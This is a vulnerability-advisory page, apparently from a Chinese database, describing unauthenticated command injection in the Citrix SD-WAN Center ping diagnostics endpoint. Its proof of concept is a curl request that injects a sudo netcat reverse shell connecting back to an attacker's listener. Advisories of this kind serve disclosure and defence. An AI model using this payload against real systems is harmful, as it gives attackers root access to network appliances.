Citrix SD-WAN中心存在多个漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

Multiple vulnerabilities were discovered in Citrix SD-WAN Center. Note: Since the 'www-data' user has been given 'sudo' privileges, all of the vulnerabilities can be exploited to gain root access. #### /Collector/diagnostics/ping Unauthenticated Command Injection The "ping" action in DiagnosticsController is susceptible to command injection by a remote, unauthenticated attacker. Specifically, the ping function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for 'ipAddress', 'pingCount', or 'packetSize'. ##### Proof of Concept ``` ncip=192.168.1.191 ncport=4444 target=192.168.1.198 curl --insecure -d 'ipAddress=%60sudo+/bin/nc+-nv+'$ncip'+'$ncport'+-e+/bin/bash%60' https://$target/Collector/diagnostics/ping ``` #### /Collector/diagnostics/trace_route Unauthenticated Command Injection The...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息